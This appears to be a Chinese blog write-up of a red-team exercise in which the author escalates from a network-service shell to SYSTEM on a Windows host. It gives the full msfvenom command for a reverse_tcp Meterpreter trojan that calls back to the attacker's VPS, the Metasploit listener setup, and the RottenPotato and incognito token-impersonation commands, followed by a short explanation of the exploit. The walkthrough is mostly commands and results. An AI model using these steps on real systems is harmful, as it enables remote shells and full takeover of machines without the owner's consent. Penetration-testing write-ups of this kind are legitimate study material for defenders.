记一次HW实战笔记 | 艰难的提权爬坑

Aspark

​ 烂土豆+Metasploit提权Meterpreter自动提权溢出漏洞模块提权利用MS16-016进行meterprter提权.......利用MS16-075提权（烂土豆）
试了多种方式都没有成功，后来找到了RottenPotato（烂土豆）Successful！！！！
0x00 前言
  对实战的一次简单整理，也算是对自己的一种收获。（主要还是自己太菜了
）距离HW的日子越来越近，一些厂商也在为真正HW前做准备。搞一些企业攻防演练，通过在实战中发现自身存在那些问题，避免在实际当中被恶意攻击者利用造成不必要的损失。
扯得有点多...
  接下来直奔正题，到提权这一步了说明已经拿到shell，怎么拿的就不细说了（@shell小王子）

0x01 生成后门程序我是在vps的命令行下直接执行以下命令获得一个针对windows的反弹型木马：

1. msfvenom -p windows/meterpreter/reverse_tcp lhost={vps监听ip} lport={端口} -f exe -o /tmp/msf.exe

复制代码

这里我们为生成的木马指定了payload为:

1. <code>windows/meterpreter/reverse_tcp</code><code>反弹到的监听端地址为你的vps地址</code><code>监听端口为6666（随意设置监听端口）</code><code>-f exe -o /tmp/msf.exe </code><code>文件输出格式为exe,并保存到路径/tmp/msf.exe</code>

复制代码

0x02 执行监听

1. <code>use exploit/multi/handler</code><code>set payload windows/meterpreter/reverse_tcp</code><code>set LHOST vps地址</code><code>show options</code>

复制代码

​

编辑

0x03 使用Potato(烂土豆) 窃取system 令牌并模仿令牌

       
•         先getuid看看自己的当前id，可以看到只是network服务
  
  

​

编辑

       
•         然后加载窃取令牌的模块
  
  

use incognito  //  用来窃取令牌、模仿令牌
这个模块是用来窃取令牌、模仿令牌的。令牌就相当于Cookie。Windows中有两种令牌，一种是Delegation Token，是为交互式登录（比如登录进系统或者通过远程桌面连接到系统）创建的。另一种是Impersonmate Token（模仿令牌），它是为非交互式会话创建的。

       
•         列出当前令牌(这是已经提权之后的，之前的截图找不到了)
  
  

list_tokens -u   //可以看到当前有一个“代表令牌”

​

编辑

       
•         冰蝎上传potato，然后进入自己放potato的目录，执行EXP
  
  

execute -cH -f ./potato.exe

​

编辑

       
•         再list_tokens看一下, 可以看到当前是有了一个SYSTEM权限的 可以模仿令牌
  
  

​

编辑

       
•         然后执行窃取令牌的命令
  
  

impersonate_token "NT AUTHORITY\\SYSTEM"  //这里需要注意一点就是反斜线是两个。

​

编辑
注意这里反斜线是两个。第一次执行提示没找到这个用户令牌。这个原因我估计是令牌失效了，就跟Cookie失效一样。所以再执行一次EXP，然后按↑键重复impersonate_token几次命令。可以看到第二次是成功模仿了用户"NT AUTHORITY\\SYSTEM"。

       
•         getuid看下自己的当前用户ID，可以看到是SYSTEM 。使用shell命令获得一个交互式cmd shell，whoami 也是成功了
  
  

​

编辑

​

编辑

到这里就提权成功了，然后可以进一步横向利用。
0x04 EXP原理浅析RottenPotato（烂土豆）提权的原理可以简述如下：

1.欺骗 “NT AUTHORITY\SYSTEM”账户通过NTLM认证到我们控制的TCP终端。
2.对这个认证过程使用中间人攻击（NTLM重放），为“NT AUTHORITY\SYSTEM”账户本地协商一个安全令牌。这个过程是通过一系列的Windows API调用实现的。
3.模仿这个令牌。只有具有“模仿安全令牌权限”的账户才能去模仿别人的令牌。一般大多数的服务型账户（IIS、MSSQL等）有这个权限，大多数用户级的账户没有这个权限。

烂土豆比热土豆的优点是：
​

      1.100%可靠
      2.（当时）全版本通杀。
      3.立即生效，不用像hot  potato那样有时候需要等Windows更新才能使用。

总之，我对这个的理解是通过中间人攻击，将COM（NT\\SYSTEM权限）在第二步挑战应答过程中认证的区块改成自己的区块获取SYSTEM令牌，然后利用msf的模仿令牌功能模仿SYSTEM令牌。